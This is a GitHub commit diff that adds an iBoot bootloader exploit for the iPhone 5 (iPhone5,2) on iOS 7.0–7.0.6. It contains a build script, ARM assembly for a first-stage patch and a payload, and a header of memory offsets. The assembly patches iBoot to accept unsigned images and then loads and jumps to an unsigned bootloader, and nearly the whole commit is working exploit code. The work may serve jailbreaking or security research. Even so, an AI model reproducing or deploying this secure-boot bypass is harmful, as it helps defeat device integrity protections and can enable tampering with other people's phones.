iBoot-1940.3.5/iPhone5,2

kok3shidoll · Jun 28, 2023 · cb3e8a2 · cb3e8a2
1 parent c2f552a
commit cb3e8a2
Show file tree

Hide file tree

Showing 8 changed files with 244 additions and 0 deletions.
diff --git a/exploit/README.md b/exploit/README.md
@@ -8,6 +8,8 @@
 | iPhone 4s [iPhone4,1] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/disk.dmg` |  
 | iPad 2 [iPad2,4] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/s/t/disk.dmg` |  
 | iPod touch 5G [iPod5,1] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/disk.dmg` |  
+| iPhone 5 [iPhone5,1] | 7.0 - 7.0.6 | 1940.3.5 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/disk.dmg` |  
 | iPhone 5 [iPhone5,1] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/s/t/u/v/w/disk.dmg` |  
+| iPhone 5 [iPhone5,2] | 7.0 - 7.0.6 | 1940.3.5 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/disk.dmg` |  
 | iPhone 5 [iPhone5,2] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/s/t/u/v/w/disk.dmg` |  
 | iPad 4th [iPad3,5] | 7.0.4 | 1940.3.5 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/disk.dmg` |  
diff --git a/exploit/iBoot-1940.3.5/iPhone5,1 b/exploit/iBoot-1940.3.5/iPhone5,1
@@ -0,0 +1 @@
+iPhone5,2
diff --git a/exploit/iBoot-1940.3.5/iPhone5,2/exploit b/exploit/iBoot-1940.3.5/iPhone5,2/exploit
diff --git a/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/build.sh b/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/build.sh
@@ -0,0 +1,11 @@
+#!/bin/sh
+
+/opt/gnuarm/bin/arm-none-eabi-gcc -c iboot_p1.s
+/opt/gnuarm/bin/arm-none-eabi-objdump -D iboot_p1.o
+/opt/gnuarm/bin/arm-none-eabi-objcopy -O binary iboot_p1.o iboot_p1.bin
+rm iboot_p1.o
+
+/opt/gnuarm/bin/arm-none-eabi-gcc -c payload.s
+/opt/gnuarm/bin/arm-none-eabi-objdump -D payload.o
+/opt/gnuarm/bin/arm-none-eabi-objcopy -O binary payload.o payload.bin
+rm payload.o
diff --git a/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/iboot_p1.s b/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/iboot_p1.s
@@ -0,0 +1,123 @@
+@ iboot_p1.s
+@
+@ Copyright (c) 2021 - 2023 @ kok3shidoll
+@
+@
+
+
+    .text
+    .syntax    unified
+
+
+    .arm
+_entry:
+    b    _entry
+
+
+    .org    0x21064
+    .thumb
+    .thumb_func
+_get_current_task:
+    bx    lr
+
+
+    .org    0x227ec
+    .thumb_func
+_arch_cpu_quiesce:
+    bx    lr
+
+
+    .org    0x257e0
+    .thumb
+    .thumb_func
+_decompress_lzss:
+    bx    lr
+
+
+    .org    0x341d8
+    .arm
+_bcopy:
+    bx    lr
+
+
+    .org    0x34c2c
+    .thumb
+    .thumb_func
+_disable_interrupts:
+    bx    lr
+
+
+    .org    0x478a0
+    .thumb
+    .thumb_func
+_iboot_patch:
+    ldr    r0, =0xbff478b2          @ end point of _iboot_patch()
+    ldr    r1, =0x84043240          @ payload
+    movs   r2, #0x44                @ payload_sz
+    blx    _bcopy
+
+    ldr    r0, =0xc2c               @ main_task() ptr
+    ldr    r1, =(0xbff43240 + 1)    @ payload_base
+    str    r1, [r4, r0]
+
+    b.n     _payload2
+
+
+    .org    0x47bb0
+    .global _payload
+    .thumb
+    .thumb_func
+_payload:
+    ldr    sp, =0xbfff8000
+    bl     _disable_interrupts
+    ldr    r4, =0x84000000
+
+    ldr    r0, =0xbff00000          @ could be 0, but we use explicit offset for iloader
+    mov    r1, r4
+    ldr    r2, =0x446c0
+    blx    _bcopy
+
+    b.n    _iboot_patch
+
+_payload2:
+    @ accept unsigned images
+    ldr    r0, =0x1ad14
+    ldr    r1, =0x60182000
+    str    r1, [r4, r0]
+
+    bl     _get_current_task
+    movs   r1, #0
+    str    r1, [r0, #0x44]
+
+    ldr    r0, =0xbff48000          @ dst
+    movs   r1, #0xfc                @ dst_sz
+    ldr    r2, =0xbff47a7c          @ nettoyeur
+    movs   r3, #0xe6                @ nettoyeur_sz
+
+    mov    r5, r0
+    bl     _decompress_lzss
+    ldr    r0, =(0xbff01768 + 1)
+
+   @b.n    next
+_next:
+    blx    r0
+    bl     _arch_cpu_quiesce
+    blx    r5                       @ nettoyeur()
+    bx     r4
+
+
+.align    2
+
+
+    .org    0x47BF4
+    .long   0xe7ffdef0
+    .short  0xdef0
+
+next:
+    @blx   r0
+    @bl    _arch_cpu_quiesce
+    @blx   r5                       @ nettoyeur()
+    @bx    r4
+    nop
+
+.align    2
diff --git a/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/payload.s b/exploit/iBoot-1940.3.5/iPhone5,2/src/asm/payload.s
@@ -0,0 +1,81 @@
+@ payload.s
+@
+@ Copyright (c) 2021 - 2023 @ kok3shidoll
+@
+@
+
+
+.set    JUMP_ADDRESS_PTR,   0xbff432a0  @ end point of payload
+.set    IMAGE3_TYPE,        0x69626f62  @ 'ibob' : new iBoot TYPE
+
+
+    .text
+    .syntax unified
+
+    .arm
+_entry:
+    b   _entry
+
+
+    .org    0x00844
+    .thumb
+    .thumb_func
+_find_boot_images:
+    bx    lr
+
+
+    .org    0x1f790
+    .thumb
+    .thumb_func
+_platform_init:
+    bx    lr
+
+
+    .org    0x2068c
+    .thumb
+    .thumb_func
+_prepare_and_jump:
+    bx    lr
+
+
+    .org    0x257b0
+    .thumb
+    .thumb_func
+_image_load_type:
+    bx    lr
+
+
+    .org    0x34c2c
+    .thumb
+    .thumb_func
+_disable_interrupts:
+    bx    lr
+
+
+    .org    0x43240
+    .global _payload
+    .thumb
+    .thumb_func
+_payload:
+    ldr        sp, =0xBFFF8000
+    bl         _disable_interrupts
+
+    bl         _platform_init
+    bl         _find_boot_images
+
+    ldr        r0, =JUMP_ADDRESS_PTR
+    adds       r1, r0, #0x4
+    mov.w      r2, #0x84000000
+    str        r2, [r0]
+    mov.w      r2, #0x100000
+    str        r2, [r1]
+    ldr        r2, =IMAGE3_TYPE
+    bl         _image_load_type         @ _image_load_type(*ptr, *sz, type)
+
+    movs       r0, #0x2                 @ BOOT_IBOOT
+    ldr        r1, =0x84000000          @ ptr
+    movs       r2, #0x0                 @ args
+    movs       r3, #0x0
+    bl         _prepare_and_jump        @ _prepare_and_jump(BOOT_IBOOT, jumpaddr, 0, 0)
+
+    nop
diff --git a/exploit/iBoot-1940.3.5/iPhone5,2/src/exploit_generic b/exploit/iBoot-1940.3.5/iPhone5,2/src/exploit_generic
diff --git a/exploit/iBoot-1940.3.5/iPhone5,2/src/header.h b/exploit/iBoot-1940.3.5/iPhone5,2/src/header.h
@@ -0,0 +1,26 @@
+/*
+ * header.h
+ * Copyright (c) 2021 - 2023 @ kok3shidoll
+ *
+ *
+ */
+
+/* iPhone5,2 - 11B554a [iBoot] */
+#define EXPLOIT_BASE                0x47bb0     // PC register obtained by exploit
+#define EXPLOIT_SECOND_BASE         0x47BFC     // Set second point to bypass overwriting by exploit
+#define EXPLOIT_SWAP_BASE           0x478A0     // Exploit area is small, so set points somewhere else
+
+/* iPhone5,2 - 11B554a [NewiBoot] */
+#define PAYLOAD_BASE                0x43240     // main_task() configured for new iBoot
+#define PAYLOAD_BASE_SIZE           0x44        // sz
+
+/* iPhone5,2 - 11B554a [ramdisk] */
+#define RDSK_PD_BASE                0x85c
+#define RDSK_PD_SECOND_BASE         0x8a8
+#define RDSK_PD_SWAP_BASE           0x570
+
+/* payload setting */
+#define EXPLOIT_BASE_SIZE           0x40
+#define EXPLOIT_SECOND_BASE_SIZE    0x34
+#define EXPLOIT_SWAP_BASE_SIZE      0x12
+